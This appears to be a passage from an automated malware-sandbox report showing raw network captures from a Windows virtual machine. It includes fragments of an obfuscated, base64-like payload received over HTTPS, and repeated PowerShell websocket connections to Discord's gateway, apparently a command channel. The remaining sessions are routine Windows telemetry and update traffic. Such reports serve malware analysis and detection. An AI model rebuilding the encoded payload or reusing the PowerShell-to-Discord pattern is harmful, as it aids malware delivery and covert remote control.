                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 2b 44 41 6f 41 5e 52 51 4d 41 41 5e 41 41 70 41 41 5e 41 41 56 41 41 5e 41 41 41 55 41 5e 41 41 41 34 4a 5e 41 41 41 41 44 5e 68 4b 41 41 41 5e 41 49 41 41 41 5e 41 41 42 2b 42 5e 67 49 41 42 48 5e 76 2f 41 51 41 5e 45 4f 74 48 2f 5e 2f 2f 38 6d 49 5e 41 41 41 41 41 5e 41 34 78 76 2f 5e 2f 2f 78 45 44 5e 66 6e 4d 43 41 5e 41 51 6f 4e 41 5e 67 41 42 69 41 5e 41 41 41 41 41 5e 66 67 59 43 41 5e 41 52 37 4a 77 5e 49 41 42 44 6d 5e 6d 2f 2f 2f 2f 5e 4a 69 41 42 41 5e 41 41 41 4f 4a 5e 76 2f 2f 2f 2f 5e 63 45 51 49 35 5e 65 41 41 41 41 5e 43 41 42 41 41 5e 41 41 66 67 59 5e 43 41 41 52 37 5e 4d 51 49 41 42 5e 44 6f 50 41 41 5e 41 41 4a 69 41 5e 42 41 41 41 41 5e 4f 41 51 41 41 5e 41 44 2b 44 41 5e 77 41 52 51 4d 5e 41 41 41 41 75 5e 41 41 41 41 42 5e 51 41 41
                                                                                                                                          Data Ascii: +DAoA^RQMAA^AApAA^AAVAA^AAAUA^AAA4J^AAAAD^hKAAA^AIAAA^AAB+B^gIABH^v/AQA^EOtH/^//8mI^AAAAA^A4xv/^//xED^fnMCA^AQoNA^gABiA^AAAAA^fgYCA^AR7Jw^IABDm^m////^JiABA^AAAOJ^v////^cEQI5^eAAAA^CABAA^AAfgY^CAAR7^MQIAB^DoPAA^AAJiA^BAAAA^OAQAA^AD+DA^wARQM^AAAAu^AAAAB^QAA
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 65 77 30 41 5e 41 41 51 71 41 5e 44 59 72 42 53 5e 68 77 2f 32 46 5e 50 4b 43 63 41 5e 41 41 59 71 41 5e 41 41 36 4b 77 5e 55 6f 6e 51 39 5e 5a 53 51 41 6f 5e 70 41 4d 41 42 5e 69 6f 41 51 69 5e 73 46 4b 48 51 5e 42 43 30 42 2b 5e 44 67 41 41 42 5e 42 54 2b 41 53 5e 6f 41 41 41 41 5e 32 4b 77 55 6f 5e 35 6f 64 4d 59 5e 33 34 4f 41 41 5e 41 45 4b 67 41 5e 41 4f 69 73 46 5e 4b 50 75 6d 46 5e 44 67 41 4b 41 5e 51 44 41 41 59 5e 71 41 42 4d 77 5e 42 41 42 72 41 5e 51 41 41 42 41 5e 41 41 45 53 73 5e 46 4b 4a 59 59 5e 57 31 30 67 42 5e 67 41 41 41 50 5e 34 4f 41 67 41 5e 34 41 41 41 41 5e 41 50 34 4d 41 5e 67 42 46 43 51 5e 41 41 41 49 41 5e 41 41 41 41 45 5e 41 51 41 41 47 5e 41 41 41 41 4f 5e 41 41 41 41 41 5e 5a 41 41 41 41 5e 42 51 41 41 41 5e 42 6f 42 41
                                                                                                                                          Data Ascii: ew0A^AAQqA^DYrBS^hw/2F^PKCcA^AAYqA^AA6Kw^UonQ9^ZSQAo^pAMAB^ioAQi^sFKHQ^BC0B+^DgAAB^BT+AS^oAAAA^2KwUo^5odMY^34OAA^AEKgA^AOisF^KPumF^DgAKA^QDAAY^qABMw^BABrA^QAABA^AAESs^FKJYY^W10gB^gAAAP^4OAgA^4AAAA^AP4MA^gBFCQ^AAAIA^AAAAE^AQAAG^AAAAO^AAAAA^ZAAAA^BQAAA^BoBA
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 44 67 48 5e 2f 2f 2f 2f 30 5e 43 73 41 41 41 5e 59 6d 49 41 59 5e 41 41 41 41 34 5e 2b 2f 37 2f 2f 5e 7a 6a 4c 2f 2f 5e 2f 2f 49 41 41 5e 41 41 41 42 2b 5e 42 67 49 41 42 5e 48 74 6c 41 67 5e 41 45 4f 75 4c 5e 2b 2f 2f 38 6d 5e 49 41 6b 41 41 5e 41 41 34 31 2f 5e 37 2f 2f 78 45 5e 44 66 6f 45 43 5e 41 41 51 6f 62 5e 41 67 41 42 69 5e 55 6d 4b 68 51 5e 71 41 33 35 2b 5e 41 67 41 45 4b 5e 47 41 49 41 41 5e 59 6c 4a 68 45 5e 42 66 6e 38 43 5e 41 41 51 6f 5a 5e 41 67 41 42 6a 5e 70 55 2f 2f 2f 5e 2f 49 41 63 41 5e 41 41 42 2b 42 5e 67 49 41 42 48 5e 73 78 41 67 41 5e 45 4f 70 54 2b 5e 2f 2f 38 6d 49 5e 41 51 41 41 41 5e 41 34 69 66 37 5e 2f 2f 33 35 38 5e 41 67 41 45 4b 5e 46 67 49 41 41 5e 59 54 41 43 41 5e 44 41 41 41 41 5e 4f 48 50 2b 2f 5e 2f 38 41 41 42
                                                                                                                                          Data Ascii: DgH^////0^CsAAA^YmIAY^AAAA4^+/7//^zjL//^//IAA^AAAB+^BgIAB^HtlAg^AEOuL^+//8m^IAkAA^AA41/^7//xE^DfoEC^AAQob^AgABi^UmKhQ^qA35+^AgAEK^GAIAA^YlJhE^Bfn8C^AAQoZ^AgABj^pU///^/IAcA^AAB+B^gIABH^sxAgA^EOpT+^//8mI^AQAAA^A4if7^//358^AgAEK^FgIAA^YTACA^DAAAA^OHP+/^/8AAB
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 41 45 5e 4f 66 62 2b 2f 5e 2f 38 6d 49 41 5e 6f 41 41 41 41 5e 34 36 2f 37 2f 5e 2f 78 45 44 46 5e 31 67 54 41 79 5e 41 4e 41 41 41 5e 41 66 67 59 43 5e 41 41 52 37 2b 5e 51 45 41 42 44 5e 6e 52 2f 76 2f 5e 2f 4a 69 41 47 5e 41 41 41 41 4f 5e 4d 62 2b 2f 2f 5e 38 34 46 66 2f 5e 2f 2f 79 41 49 5e 41 41 41 41 66 5e 67 59 43 41 41 5e 52 37 47 77 49 5e 41 42 44 71 74 5e 2f 76 2f 2f 4a 5e 69 41 45 41 41 5e 41 41 4f 4b 4c 5e 2b 2f 2f 39 2b 5e 44 77 41 41 42 5e 42 4d 42 49 41 5e 6b 41 41 41 42 5e 2b 42 67 49 41 5e 42 48 73 70 41 5e 67 41 45 4f 6f 5e 66 2b 2f 2f 38 5e 6d 49 41 55 41 5e 41 41 41 34 66 5e 50 37 2f 2f 7a 5e 69 57 41 41 41 5e 41 49 41 4d 41 5e 41 41 41 34 62 5e 66 37 2f 2f 78 5e 63 35 4a 77 41 5e 41 41 43 41 45 5e 41 41 41 41 4f 5e 46 33 2b 2f 2f 5e
                                                                                                                                          Data Ascii: AE^Ofb+/^/8mIA^oAAAA^46/7/^/xEDF^1gTAy^ANAAA^AfgYC^AAR7+^QEABD^nR/v/^/JiAG^AAAAO^Mb+//^84Ff/^//yAI^AAAAf^gYCAA^R7GwI^ABDqt^/v//J^iAEAA^AAOKL^+//9+^DwAAB^BMBIA^kAAAB^+BgIA^BHspA^gAEOo^f+//8^mIAUA^AAA4f^P7//z^iWAAA^AIAMA^AAA4b^f7//x^c5JwA^AACAE^AAAAO^F3+//^


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          22192.168.2.549760162.159.135.2344438544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:38 UTC187OUTGET /?v=9&encording=json HTTP/1.1
                                                                                                                                          Connection: Upgrade,Keep-Alive
                                                                                                                                          Upgrade: websocket
                                                                                                                                          Sec-WebSocket-Key: VaAdp+t3Wysgbc0tpZhxww==
                                                                                                                                          Sec-WebSocket-Version: 13
                                                                                                                                          Host: gateway.discord.gg
                                                                                                                                          2024-09-30 16:58:38 UTC618INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:38 GMT
                                                                                                                                          Content-Length: 0
                                                                                                                                          Connection: close
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ZHeb7pDkpH1fiIVRj%2BKGU%2BVg5dJRnzi%2BnE1a6vpb9XOPOVjJJ2YBulM3mZBve37sYpcby43ew8wgofdWOZA3Gp63gAJKgZcburTND03bQ%2FKYqXFMDfHMghjwjj8R6rGGR0%2F1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c2468f614345-EWR


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          23192.168.2.549761162.159.135.2344439064C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:38 UTC187OUTGET /?v=9&encording=json HTTP/1.1
                                                                                                                                          Connection: Upgrade,Keep-Alive
                                                                                                                                          Upgrade: websocket
                                                                                                                                          Sec-WebSocket-Key: 0Q22eY78naCzrGK6GlNJOg==
                                                                                                                                          Sec-WebSocket-Version: 13
                                                                                                                                          Host: gateway.discord.gg
                                                                                                                                          2024-09-30 16:58:38 UTC612INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:38 GMT
                                                                                                                                          Content-Length: 0
                                                                                                                                          Connection: close
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mDZ7xFkzKQlaWaLbgMM%2Bfh3pupGBYATsP3dVEUTgdUoVi8M7KK2Fcw58glScUCH2uoywzGD7822AFgI3QlnUw3yR0vX7O%2BvwDVXkUjlQJ0y7Wx6ZOERrVc9SD4pZbAmSGgUexA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c246aee54399-EWR


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          24192.168.2.549762162.159.135.2344439196C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:38 UTC187OUTGET /?v=9&encording=json HTTP/1.1
                                                                                                                                          Connection: Upgrade,Keep-Alive
                                                                                                                                          Upgrade: websocket
                                                                                                                                          Sec-WebSocket-Key: /n44b8H3mJDvHC1mW4m8Dw==
                                                                                                                                          Sec-WebSocket-Version: 13
                                                                                                                                          Host: gateway.discord.gg
                                                                                                                                          2024-09-30 16:58:39 UTC614INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:39 GMT
                                                                                                                                          Content-Length: 0
                                                                                                                                          Connection: close
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vfTvT42tp2SkdBdstqrbHV0Oojkqdg5IBu7Iu9JfehWHf9nGdTkabmU5ekW6%2BmDL9g5lh6cearc7ij3TJojQpdsV9dYGhJvd%2Fwk22VqbsaAndl0P8x1UzTs5s%2BbH8pu8kfaogA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c249ef8542fc-EWR


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          25192.168.2.54976340.113.103.199443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:51 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 30 4d 4c 48 41 75 63 35 65 6b 4f 32 76 37 68 46 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 37 32 33 32 33 36 64 37 61 61 37 62 66 36 39 0d 0a 0d 0a
                                                                                                                                          Data Ascii: CNT 1 CON 305MS-CV: 0MLHAuc5ekO2v7hF.1Context: 3723236d7aa7bf69
                                                                                                                                          2024-09-30 16:58:51 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                          2024-09-30 16:58:51 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 30 4d 4c 48 41 75 63 35 65 6b 4f 32 76 37 68 46 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 37 32 33 32 33 36 64 37 61 61 37 62 66 36 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 54 66 43 6e 7a 53 7a 79 76 51 63 39 2b 49 50 79 57 64 4a 62 61 32 41 52 75 2b 78 4b 55 37 73 39 53 69 79 34 4c 50 5a 78 71 64 79 73 71 2b 6a 73 55 44 32 63 50 4f 43 4e 69 68 79 51 49 69 5a 52 6a 37 66 59 7a 4d 6b 4c 38 61 34 54 51 4d 38 2f 32 4e 49 41 58 58 48 73 74 2f 38 59 4d 4b 66 6b 31 66 61 34 34 47 4a 76 4d 66 4a 46 4e
                                                                                                                                          Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 0MLHAuc5ekO2v7hF.2Context: 3723236d7aa7bf69<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAATfCnzSzyvQc9+IPyWdJba2ARu+xKU7s9Siy4LPZxqdysq+jsUD2cPOCNihyQIiZRj7fYzMkL8a4TQM8/2NIAXXHst/8YMKfk1fa44GJvMfJFN
                                                                                                                                          2024-09-30 16:58:51 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 30 4d 4c 48 41 75 63 35 65 6b 4f 32 76 37 68 46 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 37 32 33 32 33 36 64 37 61 61 37 62 66 36 39 0d 0a 0d 0a
                                                                                                                                          Data Ascii: BND 3 CON\QOS 56MS-CV: 0MLHAuc5ekO2v7hF.3Context: 3723236d7aa7bf69
                                                                                                                                          2024-09-30 16:58:52 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                          Data Ascii: 202 1 CON 58
                                                                                                                                          2024-09-30 16:58:52 UTC58INData Raw: 4d 53 2d 43 56 3a 20 68 4c 54 39 4f 62 42 67 47 55 53 5a 4a 61 71 62 2f 58 4c 72 31 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                          Data Ascii: MS-CV: hLT9ObBgGUSZJaqb/XLr1A.0Payload parsing failed.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          26192.168.2.54976420.12.23.50443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:59:04 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=A3DFWFen5CsLoTP&MD=7SevKY14 HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                          Host: slscr.update.microsoft.com
                                                                                                                                          2024-09-30 16:59:04 UTC560INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          Expires: -1
                                                                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                          ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                          MS-CorrelationId: b7ccfb71-b581-4d75-82d1-b660ee6cc55a
                                                                                                                                          MS-RequestId: d2e62c48-722c-42aa-9859-5aa33fcc183f
                                                                                                                                          MS-CV: fnBTBEi0WUmaHika.0
                                                                                                                                          X-Microsoft-SLSClientCache: 1440
                                                                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Date: Mon, 30 Sep 2024 16:59:03 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 30005
                                                                                                                                          2024-09-30 16:59:04 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                          Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                          2024-09-30 16:59:04 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                          Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          27192.168.2.54976840.113.103.199443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:59:19 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 30 48 55 41 43 63 4e 73 71 6b 79 4b 4d 42 4c 52 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 30 62 32 39 66 32 62 66 62 32 34 64 61 33 39 0d 0a 0d 0a
                                                                                                                                          Data Ascii: CNT 1 CON 305MS-CV: 0HUACcNsqkyKMBLR.1Context: f0b29f2bfb24da39
                                                                                                                                          2024-09-30 16:59:19 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                          2024-09-30 16:59:19 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 30 48 55 41 43 63 4e 73 71 6b 79 4b 4d 42 4c 52 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 30 62 32 39 66 32 62 66 62 32 34 64 61 33 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 54 66 43 6e 7a 53 7a 79 76 51 63 39 2b 49 50 79 57 64 4a 62 61 32 41 52 75 2b 78 4b 55 37 73 39 53 69 79 34 4c 50 5a 78 71 64 79 73 71 2b 6a 73 55 44 32 63 50 4f 43 4e 69 68 79 51 49 69 5a 52 6a 37 66 59 7a 4d 6b 4c 38 61 34 54 51 4d 38 2f 32 4e 49 41 58 58 48 73 74 2f 38 59 4d 4b 66 6b 31 66 61 34 34 47 4a 76 4d 66 4a 46 4e
                                                                                                                                          Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 0HUACcNsqkyKMBLR.2Context: f0b29f2bfb24da39<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAATfCnzSzyvQc9+IPyWdJba2ARu+xKU7s9Siy4LPZxqdysq+jsUD2cPOCNihyQIiZRj7fYzMkL8a4TQM8/2NIAXXHst/8YMKfk1fa44GJvMfJFN
                                                                                                                                          2024-09-30 16:59:19 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 30 48 55 41 43 63 4e 73 71 6b 79 4b 4d 42 4c 52 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 30 62 32 39 66 32 62 66 62 32 34 64 61 33 39 0d 0a 0d 0a
                                                                                                                                          Data Ascii: BND 3 CON\QOS 56MS-CV: 0HUACcNsqkyKMBLR.3Context: f0b29f2bfb24da39
                                                                                                                                          2024-09-30 16:59:19 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                          Data Ascii: 202 1 CON 58
                                                                                                                                          2024-09-30 16:59:19 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6a 64 61 47 78 57 38 4d 76 6b 53 50 66 2f 56 32 4c 35 32 37 34 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                          Data Ascii: MS-CV: jdaGxW8MvkSPf/V2L5274g.0Payload parsing failed.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          28192.168.2.54977040.113.103.199443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:59:50 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 75 4c 44 6e 56 64 71 54 50 6b 32 65 6b 4e 77 56 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 65 38 66 65 65 66 61 36 39 62 33 33 35 35 35 0d 0a 0d 0a
                                                                                                                                          Data Ascii: CNT 1 CON 305MS-CV: uLDnVdqTPk2ekNwV.1Context: 3e8feefa69b33555
                                                                                                                                          2024-09-30 16:59:50 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
